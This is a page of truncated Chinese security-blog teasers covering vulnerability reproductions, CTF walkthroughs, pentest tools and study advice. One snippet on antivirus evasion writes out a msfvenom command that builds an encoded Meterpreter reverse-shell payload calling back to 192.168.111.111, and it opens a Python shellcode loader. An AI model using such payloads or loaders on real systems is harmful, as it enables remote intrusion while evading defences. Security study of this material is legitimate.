漏洞复现--鸿运主动安全监控云平台任意文件下载

免责声明： **文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何…

二、BurpSuite Proxy代理

一、配置与基础配置：配置代理的端口 Forward：将拦截的请求正常发往服务器 Drop：直接将请求丢弃 intercept：开启后才能进行请求拦截 Open brower：在2021版本之后，点击该选项即可开启BurpSuite自带的浏览器…

微软发布2023年10月补丁，修复了103个缺陷，包括2个活跃的漏洞利用

导语最近，微软发布了2023年10月的补丁更新，共修复了103个缺陷。这些补丁包括两个正在被黑客利用的漏洞。让我们来看看这些补丁的具体内容和影响。修复103个缺陷微软此次的补丁更新共修复了103个缺陷，其中13个被评为严重，90个被…

自学（黑客）技术——网络安全篇

如果你想自学网络安全，首先你必须了解什么是网络安全！，什么是黑客！！ 1.无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如 Web 安全技术，既有 Web 渗透2.也有 Web 防…

python加载shellcode免杀

1、第一个shellcode加载器 import ctypes# msf生成的shellcode，命令：msfvenom -e x64/xor_dynamic -i 16 -p windows/x64/meterpreter_reverse_tcp lhost192.168.111.111 lport80 -f py -o shell.py buf b"" buf b"\xeb\x27\x5b\x53\…

安全设备和防火墙

文章目录微步TDP态势感知防火墙防火墙的负载均衡微步TDP态势感知安全设备的主要功能在黑名单，只要记住黑名单的功能在哪即可常用的是威胁选项卡的监控功能，监控模块会把实时的告警列出来，只要列出来就能分析流量是误报还是真实的&#x…

【漏洞复现】安全云平台存在任意文件下载getshell

漏洞描述深圳市强鸿电子有限公司鸿运主动安全云平台存在任意文件下载漏洞，攻击者可通过此漏洞下载敏感文件信息。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权…

CTFHub SSRF 题目

文章目录 CTFHub SSRF 通关教程1. 内网访问，伪协议利用1.1 内网访问1.2 伪协议读取文件1.3 端口扫描 2. POST请求，上传文件，FastCGI协议，Redis协议2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议 3. Bypass系列3.1 URL By…

用友移动管理系统存在任意文件上传漏洞附POC

文章目录用友移动管理系统存在任意文件上传漏洞附POC1. 用友移动管理系统简介2.漏洞描述3.影响版本4.fofa查询语句5.漏洞复现6.POC&EXP7.整改意见8.往期回顾用友移动管理系统存在任意文件上传漏洞附POC 免责声明：请勿利用文章内的相关技术从事非法测试&…

Vulnhub_driftingblues1靶机渗透测试

driftingblues1靶机信息收集使用nmap扫描得到目标靶机ip为192.168.78.166，开放80和22端口 web渗透访问目标网站，在查看网站源代码的时候发现了一条注释的base64加密字符串对其解密得到了一个目录文件访问文件发现是一串ook加密的字符串&#xf…

零基础如何自学网络安全，基于就业前景全方位讲解，包教包会

你是否对网络空间安全充满好奇？想要解开网络世界神秘的面纱？你是否对黑客技术着迷？而找不到合适的学习途径？你是否遭到过各种各样的网络攻击，却因知识的匮乏束手无策？ 那么接下来将为你全面介绍&#xff0c…

web漏洞-SSRF服务端请求伪造

目录 SSRF服务端请求伪造一、定义二、漏洞成因三、漏洞探测四、漏洞利用五、复现pikachu靶场SSRF实验，并且探测靶机端口开放情况。六、利用SSRF探测内网环境并获取shell七、绕过技巧八、SSRF防御方案九、总结 SSRF服务端请求伪造一、定义 SSRF（Server-…

Columbus：一个基于API实现的子域名发现服务工具

关于Columbus【点击领取安装包】 Columbus是一款功能强大的子域名发现与枚举工具，该工具基于API实现其功能，并且还提供了很多其他的高级功能。在该工具的帮助下，广大研究人员可以快速且高效地实现子域名枚举任务。【点击领取安装包】前端…

防火墙的相关知识

1.firewall防火墙（centos和redhat） 1. 查看firewall服务状态 systemctl status firewalld● firewalld.service - firewalld - dynamic firewall daemonLoaded: loaded (/usr/lib/systemd/system/firewalld.service; disabled; vendor preset: enabled)…

泛微OA e-office平台uploadify.php任意文件上传漏洞

泛微OA e-office平台uploadify.php任意文件上传漏洞复现 0x01 前言免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的…

Java卷上天，可以转行干什么？

小刚是某名企里的一位有5年经验的高级Java开发工程师，每天沉重的的工作让他疲惫不堪，让他萌生出想换工作的心理，但是转行其他工作他又不清楚该找什么样的工作因为JAVA 这几年的更新实在是太太太……快了，JAVA 8 都还没用多久&am…

（2023版）零基础入门网络安全_Web安全，收藏这一篇就够了

由于我之前写了不少网络安全技术相关的文章和回答，不少读者朋友知道我是从事网络安全相关的工作，于是经常有人私信问我： 我刚入门网络安全，该怎么学？要学哪些东西？有哪些方向？怎么选&#xff1f…

网络安全——黑客自学（笔记）

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！！！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队…

网络安全_黑客（自学）

想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！！！ 网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队…

终端准入控制系统，保障企业内网安全的关键防线

随着网络技术的不断发展，企业面临的安全威胁也越来越多。终端作为承载企业业务的媒介，对内网资产安全有着重要影响。确保内网终端（如PC、BYOD、IoT等）能够得到统一管理，对保护内网安全很有必要。终端准入控制作为一种有…

【网络安全 --- kali2023安装】超详细的kali2023安装教程（提供镜像资源）

如果你还没有安装vmware 虚拟机，请参考下面博客安装【网络安全 --- 工具安装】VMware 16.0 详细安装过程（提供资源）-CSDN博客【网络安全 --- 工具安装】VMware 16.0 详细安装过程（提供资源）https://blog.csdn.net/m0…

练[SUCTF 2019]CheckIn

[SUCTF 2019]CheckIn 文章目录 [SUCTF 2019]CheckIn掌握知识解题思路关键paylaod 掌握知识 .user.ini文件上传利用–需要上传目录有一个php文件(index.php)，文件头绕过，文件内容<？检测解题思路打开题目链接，发现又是一…

靶场通关记录

OSCP系列靶场-Esay-CyberSploit1 总结 getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录提权思路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权准备工作启动VPN 获取攻击机IP > 192.168.45.220 启动靶机获取目标机器I…

CTF | CTF比赛题解分享

本文由掌控安全学院 - sbhglqy 投稿前言：由于此次比赛的题目较多，所以这是这个比赛的第一篇wp，共20题，先记录一下，防止忘记。里面有些题目是新手题较为简单，但也有许多有意思的题目，真的是做的…

什么是网络安全？掌握网络安全技能可以做什么

前言随着互联网时代的到来，越来越多的人依靠互联网工作和生活，网络安全变得越来越重要。市场对网络安全工程师职位的需求逐渐增加。越来越多的朋友希望发展网络安全技能。那么网络安全是什么？如何学习网络安全？学完网络安全可以…

Pikachu靶场——跨站请求伪造(CSRF)

文章目录 1. 跨站请求伪造（CSRF）1.1 CSRF(get)1.2 CSRF(post)1.3 CSRF Token1.4 CSRF漏洞防御 1. 跨站请求伪造（CSRF） 还可以参考我的另一篇文章：跨站请求伪造(CSRF) 全称Cross-site request forgery，翻译…

网站的常见攻击与防护方法

在互联网时代，几乎每个网站都存在着潜在的安全威胁。这些威胁可能来自人为失误，也可能源自网络犯罪团伙所发起的复杂攻击。无论攻击的本质如何，网络攻击者的主要动机通常是谋求经济利益。这意味着无论您经营的是电子商务项目还是小型商业网站…

漏洞复现(CVE-2023-35843)

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

游戏行业该如何应对DDoS攻击问题呢?

当发现游戏服务器有受到攻击情况，可以通过添加防御类产品如:高防IP来解决遇到的攻击情况，通过DNS域名解析，高防IP将替代源站服务器IP对外提供在线互联网业务，所有业务流量都将牵引至高防IP上进行清洗，干净流量回注给源…

攻防世界题目练习——Crypto密码新手+引导模式（二）（持续更新）

题目目录 1. 转轮机加密2. easychallenge 上一篇：攻防世界题目练习——Crypto密码新手引导模式（一）（持续更新） 1. 转轮机加密首先了解一下轮转机加密吧。传统密码学(三)——转轮密码机题目内容如下： …

BUUCTF 金三 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 只有一个附件，下载下来有一张GIF图片。解题思路： 本题一共有2种解法（本人找到的） 方法一： 1、打开这张GIF图片，观察到不正常闪动，似…

Yakit工具篇：爆破与未授权检测的使用

简介(来自官方文档) 爆破和未授权检测是网络安全领域中一种常见的测试技术，其主要目的是测试系统或应用程序中的口令是否强健，Yakit的爆破与未授权检测模块则实现了该部分的内容。这个模块可以对多种常见协议和服务（如ftp、memcached、mon…

面向红队的自动化引擎工具

gogo 介绍面向红队的、高度可控的可拓展的自动化引擎。特征如下： 自由的端口配置支持主动/主动指纹识别关键信息提取，如标题、证书以及自定义提取信息的正则支持nuclei poc，poc目录：https://chainreactors.github.io/wiki/…

一键搞定！黑群晖虚拟机+内网穿透实现校园公网访问攻略！

文章目录前言本教程解决的问题是：按照本教程方法操作后，达到的效果是前排提醒： 1. 搭建群晖虚拟机1.1 下载黑群晖文件vmvare虚拟机安装包1.2 安装VMware虚拟机：1.3 解压黑群晖虚拟机文件1.4 虚拟机初始化1.5 没有搜索到黑群晖的解…

正向代理流程

正向代理场景已经拿下了一台服务器，该服务器有两个网卡，一个公网，一个私网未被攻击的服务器只有一个内网网卡，它不能和其他网段通信，只能在本网段通信，被叫做不出网主机攻击机需要直接连接未被攻击的服务器…

隐写术--python隐写

0x00 背景何为隐写术？ 隐写术是一类可以隐藏自己写的一些东西的方法，是一门关于信息隐藏的技巧与科学。指的是采取一些不让除预期的接收者之外的任何人知晓信息的传递事件或者信息的内容的方法。可参考一文让你完全弄懂Stegosaurus - 知乎本文要…

独家分析：安卓“Janus”漏洞的产生原理及利用过程

*本文中涉及到的相关漏洞已报送厂商并得到修复，本文仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担。近日，Google在12月发布的安卓系统安全公告中披露了一个名为“Janus”安卓漏洞（漏洞编号&#…

Cobalt Strike 工具使用

安装需要js环境介绍 obalt Strike是一款基于java的渗透测试神器，常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用，分为客户端与服务端，服务端是一个，客户端可以有多个，非常…

Python武器库开发-基础篇（一）

前言以Python编程为主，围绕渗透测试展开的一门专栏。专栏内容包括： Python基础编程（Python基础、语法、对象、文件操作，错误和异常），Python高级编程（正则表达式、网络编程、WEB编程&#xff0…

BUUCTF题解之[极客大挑战 2019]Havefun 1

1.题目分析使用浏览器开发者工具查看网页源码，查看疑似flag的代码。 （特别是注释了的源码，一般是HTML,JS,PHP的源码） 修改统一资源定位符URL访问服务器后端接口，拿到flag。 1.URL URL是统一资源定位符（…

黑客利用人工智能窃取医疗数据的 7 种方式

人工智能被描述为医疗保健行业的一把双刃剑。基于人工智能的系统可以分析大量数据并在早期和可治疗的阶段检测疾病，它们可以比任何人类更快地诊断症状，并且人工智能正在帮助药物开发，使新的救命药物得以识别并将其推向市场速度更快且成本显着…

黑客技术（自学）——网络安全

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学？如何学？ 今天给大家分享一下，很多人上来就说想学习黑客&#xff0c…

Dreamweaver2019安装教程从零基础入门到精通（非常详细附安装包）看完这一篇就够了

软件介绍 Dreamweaver简称“DW”，是一款专业的网页设计软件，集网页制作和网站管理于一身的即时检索的网页代码编辑器，利用对 HTML、CSS、JavaScript 等内容的支持，设计人员和开发人员可以在几乎任何地方快速制作并发布网页。借助…

NAND存储器转储分析 - 使用ECC修复位错误与UBI镜像固件分析

一、简介这篇研究论文将通过黑客的视角，详细阐述如何操作 NAND dump 以及如何获取 dump 文件中的所有文件。每一步骤以及所使用的方法均会细致解析，并配以实例说明。本文主要关注的是物理 NAND dump，这是从通用编程器中提取出的 dump 文件…

安装与脏数据绕过_安全狗

1安全狗 1.1 环境准备安全狗safedogwzApacheV3.5.exe，安装步骤省略， pikachu环境：https://zhuanlan.zhihu.com/p/568493971 安装注意事项：安装完后php和web服务都需要重启注意事项：服务名php版本保持一致安装过…

寻找Windows API 原始字节（x64dbg）

首先我们将我们的木马移入x64dbg 第一种方法通过命令寻找 disasm CreateRemoteThreadEx第二种方法将调试器附加到kernelbase.dll后转到符号选项卡，最后，在搜索栏中，我们可以搜索CreateRemoteThreadEx函数并双击它以获取下列&#xff1a…

修改ConsoleApplication17_2项目实现oss上线

首先创建号oss，上传文件，复制临时链接木马内写可以看到能成功上线但是有个问题就是占用cpu大小为9%左右，这里我用的是腾讯云oss实现的，用阿里云oss实现也是9%左右我再次进行url的aes加密还是百分之9左右， 这里…

vulnhub靶机Funbox11

下载地址：Funbox: Scriptkiddie ~ VulnHub 主机发现 arp-scan -l 目标192.168.21.164 端口扫描 nmap --min-rate 1000 -p- 192.168.21.164 端口好多处理一下吧 nmap --min-rate 1000 -p- 192.168.21.164 |grep open |awk -F / {print $1} |tr \n , 端口服务版本…

最全安全多方计算框架合集（持续更新）

安全多方计算框架本文对现有安全多方计算/学习框架进行了全面、系统的梳理。目前大部分安全多方计算框架主要基于秘密共享、同态加密、混淆电路以及相关基本模块的组合。通常使用定制的协议来支持特定数量的参与方（一般为两方或三方），导致…

软考-代码分析

基于Windows32位系统分析下列代码： void Challenge(char *str) { char temp[9]{0}； strncpy(temp，str，8)； printf("temp%s\n"，temp)； if(strcmp(temp"Please!")0){ printf…

你真的了解黑客吗？

前言：本文旨在介绍国内外黑客的发展历史，以及作为一名黑客所需的素质和原则目录一.黑客概述二.黑客分类三.国外黑客的历史上世纪60年代初上世纪80年代初上世纪80年代末上世纪90年代早期上世纪90年代末期 2000年后四.中国黑客的历史 …

安全渗透测试网络基础知识之路由技术

#1.静态路由技术 ##1.1路由技术种类：静态路由技术、动态路由技术 ##1.2静态路由原理静态路由是网络中一种手动配置的路由方式，用于指定数据包在网络中的传输路径。与动态路由协议不同，静态路由需要管理员手动配置路由表，指定目的网络和下一跳路由器的关联关系。比较适合…

【网络安全 --- 任意文件下载漏洞（1）】任意文件下载漏洞

一，环境，工具准备 1-1 VMVare 16 虚拟机及下载安装（资源） 请参考以下博客安装（特详细）：【网络安全 --- 工具安装】VMware 16.0 详细安装过程（提供资源）-CSDN博客【网络安…

网络监控与故障排除：netstat命令的使用指南

文章目录概述什么是 netstat 命令？netstat 命令的作用和功能netstat 命令的常见用途安装和基本用法安装 netstat 命令netstat 命令的基本语法查看活动网络连接查看网络接口信息查看所有网络接口信息查看指定网络接口信息网络接口状态说明网络连接状态显示所有连…

堆叠注入（[强网杯 2019]随便注1）

详解： 堆叠注入（Stack Injection）是一种计算机安全概念，涉及攻击者向程序的堆栈内存中插入恶意代码，以便在程序执行期间执行非预期的操作。堆栈注入攻击通常利用程序在处理函数调用时使用的堆栈机制。当一个函数被调…

程序员没有工作经验怎么办？能不能找到工作？

本人一般本科，软件专业。工作8年，目前任一家中型公司技术主管（履技术总监的工作，但不敢以总监自居） 没经验的同学找工作，面试官看的不是你已经积累了多少，而是看你的态度和学习能力&#xff0c…

红队打靶：Nyx: 1打靶思路详解（vulnhub）

目录写在开头第一步：主机发现和端口扫描第二步：ssh私钥登录获取初始立足点第三步：sudo gcc提权番外篇：如何掉进web渗透的陷阱无法自拔总结与思考写在开头我个人的打靶顺序是根据红队笔记大佬的视频顺序&#xff0…

批量挖漏洞（从内网到外网、从白盒到黑盒）

**前言：**此次挖洞较为基础，分析得不足的地方望大佬指正。内网挖洞： 建议像我这样入门不久的可以拿自己学校内网练练手先（得授权），再在在教育行业SRC等漏洞平台上挖掘漏洞，赢得认可&#xff0c…

awvs安装教程和使用

awvs安装和使用文章目录 awvs安装和使用安装（awvs）Acunetix-v23.9-Windows1 安装前准备1.1 查看帮助文档，修改此文件1.2 追加hosts 参数1.3 根据REANME.txt帮助文档提示，启动工具(Now install the tool)，双击 1.4 安装…

今年这情况，还能不能选计算机了？

在知乎上看到一个有意思的问题，是劝退计算机的。主要观点： 计算机从业人员众多加班，甚至需要99635岁危机秃头综上所属，计算机不仅卷，而且还是一个高危职业呀，可别来干了。关于卷近两年确实能明显感觉…

crypto：rsarsa

题目下载压缩包后得到提示文本根据提示文本信息，我们知道p q e c，可以求出n、φ(n)、d，进而求出m import gmpy2p 964842302901051567659055174001042653494573763923573980064398935203985250729849139956103500916342705037010757073363…

网络安全（黑客技术）—自学手册

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

Yakit工具篇：简介和安装使用

简介(来自官方文档) 基于安全融合的理念，Yaklang.io 团队研发出了安全领域垂直语言Yaklang，对于一些无法原生集成在Yak平台中的产品/工具，利用Yaklang可以重新编写他们的“高质量替代”。对于一些生态完整且认可度较高的产品，Y…

Apache Log4j Server (CVE-2017-5645) 反序列化命令执行漏洞

文章目录 Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645）1.1 漏洞描述1.2 漏洞复现1.2.1 环境启动1.2.2 漏洞验证1.2.3 漏洞利用 1.3 加固建议 Apache Log4j Server 反序列化命令执行漏洞（CVE-2017-5645） 1.1 漏洞描述…

网络安全之应急流程

近期需要弄一个网络安全应急的流程，其实对于网络安全应急并不陌生，只是在一些特定的环境上会遇到一些难以解决的问题或者缺少某个岗位的技术人员，因为不同运营商的应急小队也是不同的岗位，如今有着安全设备的告警和预警&#xff0…

xray的使用

不需要扫描点击双击xray 1.打开 2.使用主打扫描 3.被动扫描网站与 Burp 联动 - xray 安全评估工具文档双击 xray cmd xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output text.html 1.bp 2.这道这个 3.配置 xray 改为* 4.代理

金山终端安全系统V9.0 SQL注入漏洞复现

0x01 产品简介金山终端安全系统是一款为企业提供终端防护的安全产品，针对恶意软件、病毒和外部攻击提供防范措施，帮助维护企业数据和网络。 0x02 漏洞概述金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞，该…

Spring框架漏洞复现及解析（CVE-2016-4977、CVE-2022-22963、CVE-2017-8046、CVE-2022-22978）

Spring Security OAuth2 远程命令执行漏洞（CVE-2016-4977） 一、漏洞简介： Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时，由于使用了Springs Expression Languag…

慎投！包含Hindawi旗下2本，5本Scopus期刊被剔除！（附9月更新下载）

2023年9月Scopus期刊目录更新 Scopus官网近日更新了9月期刊目录，此次更新与上次（2023年8月）相比，有5本期刊不再被收录，详情如下： / Scopus期刊目录说明 / • SCOPUS 和 SCI 的相同点： 简单来说…

DC-6 靶机

DC_6 信息搜集存活检测详细扫描需要添加 DNS 解析 vim /etc/hosts后台网页扫描 dirsearch -u http://10.4.7.150网页信息搜集使用 wappalyzer 插件识别 cms 指纹，发现为熟悉的 WordPress 并且发现了网站的登陆页面直接上 wpscan 扫描用户 wpscan --url…

数据防泄密软件排行榜

数字化时代，数据已成为企业的重要资产。然而，数据泄露事件却时常发生，给企业带来巨大的经济损失和声誉风险。因此，数据防泄密软件的重要性日益凸显。数据防泄密软件是什么它是一种专门用于防止敏感数据泄露的软件工具。它通过对…

伊朗相关的OilRig组织在为期8个月的网络攻击中针对中东政府

导语伊朗相关的OilRig组织最近在中东政府中展开了一场长达8个月的网络攻击行动。这次攻击导致了文件和密码的被窃取，并且在其中一次攻击中，攻击者还使用了一种名为PowerExchange的PowerShell后门。据Symantec的威胁猎人团队称，他们在一份与T…

来看看如何使用CLOUDFARE_实现网络聚合_利用安全的网络协议实现网络通讯---工具箱工作笔记002

下面这个操作是需要进行安全网络下操作的首先需要去访问https://1.1.1.1这样一个网站然后去下载对应的软件，安装上首先进入这个网址 www.cloudflare.com 去点击注册注册以后然后登录，登录以后，然后左侧有个zero trust 然后再去写一个名字，团队的名字然后选择也是免…

来看看如何使用Proton_实现网络聚合_利用安全的网络协议实现网络通讯---工具箱工作笔记001

首先要去注册proton.com 注册的时候首先去注册一个proton的邮箱@protonmail.com这个邮箱注册以后进入，然后选择中文然后再去下载这个CDN加速网址去下载了以后选择左侧免费的就可以了

开发中的常见安全威胁问题与应对策略

在软件开发过程中，安全性是至关重要的，因为安全漏洞可能导致数据泄露、恶意攻击和系统崩溃。本文将介绍开发中常见的安全性问题，包括不同情景、需要考虑的问题以及相应的解决方案。 1、情景 : 用户身份验证实际情景想象一下，您…

实战公益SRC | 弱口令登录+任意文件上传

目录附言：从补天的公益src公司中选中了幸运儿。 1. 通过hunter鹰图平台搜索公司的相关资产，发现其采用了华途应用安全网关。 2.访问相关地址，尝试使用弱口令登录，发现直接利用admin/admin就登录了，可以看到后台的相…

解决VMware虚拟机更新17.5.0版本后，启动虚拟机导致电脑重启的问题。（建议收藏）

今天VMware虚拟机又迎来了新的一次更新，这次更新重点在于安全性提高了不少。更新也是花了不少时间，更新完成后，我满怀着激动欣喜的心情打开了我的Kali，。。。哎，不是，怎么黑屏了，然后看到了物…

网络安全入门必学内容有哪些？网络安全最全知识点汇总来了

随着时代的发展，经济、社会、生产、生活越来越依赖网络。而随着万物互联的物联网技术的兴起，线上线下已经打通，虚拟世界和现实世界的边界正在变得模糊。这使得来自网络空间的攻击能够穿透虚拟世界的边界，直接影响现实世界的安全。…

DDOS直接攻击系统资源

DDOS ——直接攻击系统资源思路： 攻击机利用三次握手机制，产生大量半连接，挤占受害者系统资源，使其无法正常提供服务。 1、先体验下受害者的正常网速。在受害者主机上执行以下命令 (1)开启Apache。 systemctl start apache2 (2…

【漏洞复现】panalog日志审计系统任意用户创建漏洞和后台命令执行

漏洞描述 panalog为北京派网软件有限公司，一款流量分析，日志分析管理的一款软件。存在任意用户创建漏洞和后台命令执行漏洞，可先通过任意用户创建，然后进行后台命令执行，获取服务器权限。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公…

新上线游戏产品需不需要防御？

游戏运营免不了遭受恶意DDoS和CC攻击，且攻击常达百G以上，攻击流量过大，超过一般服务器的基础防护能力，不少企业面对大流量攻击显得束手无策，只能选择被迫停机，其次游戏行业利润高，很容易被黑客盯…

Python武器库开发-高级特性篇(七)

高级特性篇(七) 装饰器装饰器是给现有的模块增添新的小功能，可以对原函数进行功能扩展，而且还不需要修改原函数的内容，也不需要修改原函数的调用。这也称为元编程，因为程序的一部分试图在编译时修改程序的另一部分。Python中的…

新的iLeakage攻击从Apple Safari窃取电子邮件和密码

图片导语：学术研究人员开发出一种新的推测性侧信道攻击，名为iLeakage，可在所有最新的Apple设备上运行，并从Safari浏览器中提取敏感信息。攻击概述 iLeakage是一种新型的推测性执行攻击，针对的是Apple Silicon CPU和…

nu1l-死亡ping命令攻略

book-nu1l docker 虚拟化技术把传统的虚拟机堪称容器依赖镜像启动容器，镜像可以理解为模板克隆的虚拟机，删除容器，对镜像没有影响镜像在云端本地要使用某个镜像，根据地址，直接从云端拉取基本命令 # 查看系统…

从0到1：CTFer成长之路——死亡 Ping 命令

死亡 ping 命令绕过探测手动尝试慢脚本生成转义后的字符，后面拼接命令 import urllib.parsewith open(r"C:\Users\LEGION\Desktop\RCE.txt", "w", encoding"utf-8") as f:for i in range(0, 255):encoded_str urllib.parse…

jquery-picture-cut 任意文件上传（CVE-2018-9208）

jquery-picture-cut 任意文件上传 （CVE-2018-9208） 漏洞描述 picture cut是一个jquery插件，以非常友好和简单的方式处理图像，具有基于bootstrap或jquery ui的漂亮界面，具有ajax上传，从资源管理器拖动图像…

CTF-Web(2)SQL注入

笔记目录 CTF-Web(2)SQL注入CTF-Web(3)文件上传漏洞 1.注入介绍 (1)原理 ①SQL注入如何注入Webshell 1.目标存在sql注入漏洞，且已经获取目标的绝对路径 2.并且通过探测发现目标能够进行数据的导入和导出操作，即secure_file_priv为空 3.当前数据库是最高…

记录一次时序数据库的实战测试

0x1.前言本文章仅用于信息安全防御技术分享，因用于其他用途而产生不良后果，作者不承担任何法律责任，请严格遵循中华人民共和国相关法律法规，禁止做一切违法犯罪行为。文中涉及漏洞均以提交至教育漏洞平台。 0x2.背景在某次Edus…

创纪录的1亿RPS DDoS攻击利用HTTP/2快速重置漏洞

导语：最近，一项创纪录的DDoS攻击引起了广泛关注。攻击者利用了HTTP/2协议中的一个快速重置漏洞，发起了一系列超大规模的攻击。本文将为大家详细介绍这次攻击的背景、影响以及应对措施。攻击背景最近，全球范围内遭受了一系列规模…

seacms_CNVD-2020-22721_v10.1漏洞分析与复现

seacms 远程命令执行漏洞复现文章目录 seacms 远程命令执行漏洞复现一、基本信息二、组件简介三、漏洞详情漏洞介绍影响范围危害四、防御1. 漏洞存在性检测2. 修复建议3. 规避措施4. 漏洞利用检测五、漏洞复现1. 复现环境2. 漏洞复现一、基本信息 titlecontentnote漏洞编号…

【漏洞复现】酒店宽带运营系统RCE

漏洞描述安美数字酒店宽带运营系统 server_ping.php 远程命令执行漏洞免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益&#xff…

【网络安全 --- web服务器解析漏洞】IIS，Apache，Nginx中间件常见解析漏洞

一，工具及环境准备以下都是超详细保姆级安装教程，缺什么安装什么即可（提供镜像工具资源） 1-1 VMware 16.0 安装【网络安全 --- 工具安装】VMware 16.0 详细安装过程（提供资源）-CSDN博客文章浏览阅读20…

漏洞复现-showdoc文件上传_v2.8.3_(CNVD-2020-26585)

showdoc文件上传_v2.8.3_CNVD-2020-26585 漏洞信息 showdoc 2.8.3 以下版本中存在安全漏洞CNVD-2020-26585文件上传漏洞描述 ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc，你可以方便地使用markdown语法来书写出美观的API文档、数据字…

加解密原理（HCIA）

一、加密技术 1、加密的两个核心组件 2、加密技术作用： 二、加解密技术原理 1、对称加密 2、非对称加密 （1）思考问题？ 1）、有了非对称加密为什么还用对称加密？ 2）、如何传递秘钥呢&…

致远OA wpsAssistServlet任意文件读取漏洞复现 [附POC]

文章目录致远OA wpsAssistServlet任意文件读取漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议致远OA wpsAssistServlet任意文件读取漏洞复现 [附POC] 0x01 前言免责声明：请勿利用…

漏洞复现--金蝶云星空 CommonFileServer 任意文件读取

免责声明： 文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直…

Vulnhub-DC-3 靶机复现完整过程

啰嗦两句： 提权之前完成是一个月前做的，当时在提权处出了点问题就搁置了，今天才完成，所以IP地址可能会会有变化注意：后续出现的IP地址为192.168.200.55同样是靶机IP地址，若本文能有帮助到你的地方&#xf…

面试分享 | 护网蓝队面试经验

关于蓝队面试经验 1.自我介绍能力重要性为什么将自我介绍能力放在第一位，实际上自我介绍才是面试中最重要的一点，因为护网面试并没有确定的题目，让面试官去提问更多是的和面试官的一种 “交谈” ，面试的难易程度也自然就取决…

基于等级保护梳理服务器安全合规基线

背景作为运维，当对新上架的服务器装完操作系统后，第一步就是对操作系统进行初始化配置来保证配置合规，此时你可能就会有疑问：我们应该初始化哪些参数，有没有相关标准参考呢？ 要想真正了解进行初始化配置…

CVE-2023-46227 Apache inlong JDBC URL反序列化漏洞

项目介绍 Apache InLong（应龙）是一站式、全场景的海量数据集成框架，同时支持数据接入、数据同步和数据订阅，提供自动、安全、可靠和高性能的数据传输能力，方便业务构建基于流式的数据分析、建模和应用。项目地址 h…

Positive Technologies 在迪拜宣布与地区网络安全解决方案提供商开展合作

在中东最大的信息技术展 GITEX GLOBAL 2023 的间隙，Positive Technologies 同意与八家组织（网络安全服务和解决方案提供商）合作，在该地区开展合作，推广最先进的产品，并分享信息安全领域的经验。该公司强调了…

buuctf_练[网鼎杯 2018]Fakebook

[网鼎杯 2018]Fakebook 文章目录 [网鼎杯 2018]Fakebook掌握知识解题思路关键paylaod 掌握知识 SQL注入的联合注入；闭合类型的探查，本次是数字型闭合；SQL注入的读取文件的利用解题思路打开题目链接，发现主界面给了一些信息…

PHP 危险函数2-代码执行语句

代码执行语句 eval() 不是函数，不能被动态调用，并且需要以 ;结束直接输出，不执行 <?php$code"phpinfo();";echo $code;?>eval() 语句执行 <?php$code"phpinfo();";eval($code); // eval 不是函数&am…

php简单后门实现及php连接数据库

php简单后门实现代码 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>easybackdoor</title>…

在 MaxPatrol SIEM 的帮助下，Positive Technologies 专家检测到影响超过 25 万用户的恶意软件

👨‍💻 从未经验证的来源下载软件？错误。从 torrent 跟踪器下载？致命错误。八月份，我们的专家使用 MaxPatrol SIEM 在一家俄罗斯公司的网络中发现了异常活动。经过调查，CSIRT 团队（Positive T…

【Windows网络编程】一.主机相关网络信息编程

需要包含的头文件： #include <iostream> #include <WinSock2.h> #parama comment(lib,"ws2_32.lib") #include

核心交换机、汇聚层交换机、接入层交换机的区别和特点

核心交换机核心交换机是三层交换机支持路由功能，高速转发，有大容量接口宽带（万兆），较大的背板出来能力，性能高于汇聚、接入交换机。例如：学校有好几栋教学楼还有其他的寝室楼等等&#xff0c…

美国财政部制裁俄罗斯洗钱人士打击网络犯罪

